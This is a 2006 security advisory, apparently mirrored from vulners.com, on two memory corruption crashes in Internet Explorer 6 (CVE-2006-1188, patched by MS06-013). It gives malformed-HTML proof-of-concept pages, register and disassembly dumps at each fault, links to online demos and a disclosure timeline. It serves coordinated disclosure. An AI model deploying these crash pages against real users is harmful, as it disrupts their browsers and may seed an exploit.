[BuHa-Security] MS06-013: HTML Tag Memory Corruption Vulnerability in MS IE 6 SP2

2006-05-2700:00:00

vulners.com

JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

| BuHa Security-Advisory #13 | May 25th, 2006 |

| Vendor | MS Internet Explorer 6.0 |
| URL | http://www.microsoft.com/windows/ie/ |
| Version | <= 6.0.2900.2180.xpsp_sp2 |
| Risk | Critical (Memory Corruption) |

The Microsoft Security Response Center rated following issues as
critical because, on the face of it, they could produce an exploitable
memory corruption (see HTML Tag Memory Corruption Vulnerability -
CVE-2006-1188 [1]) with a variant of my PoC.

o Description:

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Memory Corruption Vulnerability: <mshtml.dll>#7d519030

Following HTML code forces IE 6 to crash:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
> <html> <fieldset> <h4>
> <pre><td>
> <menu>
> <legend>
> <a>
> <ul>
> <small>
> <fieldset>
> <h6>
> </h6
> </u>
> </optgroup>
> </tr>
> </map>
> </ul
> </dfn>
>
> </del>
> </h2>
> </dir>
> </ul>

Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html

These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000
> edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894
>
> 7d519012 55 push ebp
> 7d519013 8bec mov ebp,esp
> 7d519015 8b4104 mov eax,[ecx+0x4]
> 7d519018 394508 cmp [ebp+0x8],eax
> 7d51901b 7c09 jl mshtml+0x69026 (7d519026)
> 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb)
> 7d51901f 33c0 xor eax,eax
> 7d519021 40 inc eax
> 7d519022 5d pop ebp
> 7d519023 c20800 ret 0x8
> 7d519026 83c8ff or eax,0xffffffff
> 7d519029 ebf7 jmp mshtml+0x69022 (7d519022)
> 7d51902b 90 nop
> 7d51902c 90 nop
> 7d51902d 90 nop
> 7d51902e 90 nop
> 7d51902f 90 nop
> FAULT ->7d519030 8b4108 mov eax,[ecx+0x8]
> ds:0023:00000008=???
> 7d519033 85c0 test eax,eax
> 7d519035 7425 jz mshtml+0x6905c (7d51905c)
> 7d519037 8b10 mov edx,[eax]
> 7d519039 f6c210 test dl,0x10
> 7d51903c 7408 jz mshtml+0x69046 (7d519046)
> 7d51903e f6c220 test dl,0x20
> 7d519041 7519 jnz mshtml+0x6905c (7d51905c)
> 7d519043 8b400c mov eax,[eax+0xc]
> 7d519046 8b4808 mov ecx,[eax+0x8]
> 7d519049 85c9 test ecx,ecx

o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35

Following HTML code forces IE 6 to crash:
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/html4/loose.dtd">
> <bdo>
> </span>
> <pre>
>
> <param>
> <form>
> <colgroup>
> <small>
> </small>
> </colgroup>
> </map>
> </button>
> </code
>
> <blockquote>
> <th>
> <small>
>
> </tbody>
> </tr>
> </ol>
> </tbody>
> </ol>
> </code>
> </strong>
>
>
> <head>
> <fieldset>
> <style>
>
> </style
> </dir>
> </a>
> </td
> </li>
> </label
> </object>
> </bdo
> </th
> </object
> </q>
>
> <ol>
> <object>

Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html

These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0
> edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778
>
> 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424)
> 7d529d13 85c0 test eax,eax
> 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2
> (7d5aede0)
> 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8]
> 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80]
> 7d529d26 5e pop esi
> 7d529d27 5d pop ebp
> 7d529d28 c20c00 ret 0xc
> 7d529d2b 90 nop
> 7d529d2c 90 nop
> 7d529d2d 90 nop
> 7d529d2e 90 nop
> 7d529d2f 90 nop
> 7d529d30 8bff mov edi,edi
> 7d529d32 55 push ebp
> 7d529d33 8bec mov ebp,esp
> FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14]
> ds:0023:00000014=??
> 7d529d39 c1e004 shl eax,0x4
> 7d529d3c 0578aa4b7d add eax,0x7d4baa78
> 7d529d41 7410 jz mshtml+0x79d53 (7d529d53)
> 7d529d43 8b400c mov eax,[eax+0xc]
> 7d529d46 234508 and eax,[ebp+0x8]
> 7d529d49 f7d8 neg eax
> 7d529d4b 1bc0 sbb eax,eax
> 7d529d4d f7d8 neg eax
> 7d529d4f 5d pop ebp
> 7d529d50 c20400 ret 0x4
> 7d529d53 33c0 xor eax,eax
> 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)

o Vulnerable versions:

The DoS vulnerability was successfully tested on:
> MS IE 6 SP2 - Win XP Pro SP2
> MS IE 6 - Win 2k SP4

o Disclosure Timeline:

xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.

o Solution:

Install the latest security update (MS06-013) for Internet Explorer [2].

o Credits:

Thomas Waldegger <[email protected]>
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[email protected]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online: http://morph3us.org/advisories/20060525-msie6-sp2-2.txt

[1] http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188
[2] http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx

Don't you feel the power of CSS Layouts?
BuHa-Security Community: http://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEdjSQkCo6/ctnOpYRA9qlAJ9CfZxTO0qAs+6O12hmutZ6eeHoMwCghkd2
vrVBfqAxWpoJ9Ny1W8OAtEw=
=M5nj
-----END PGP SIGNATURE-----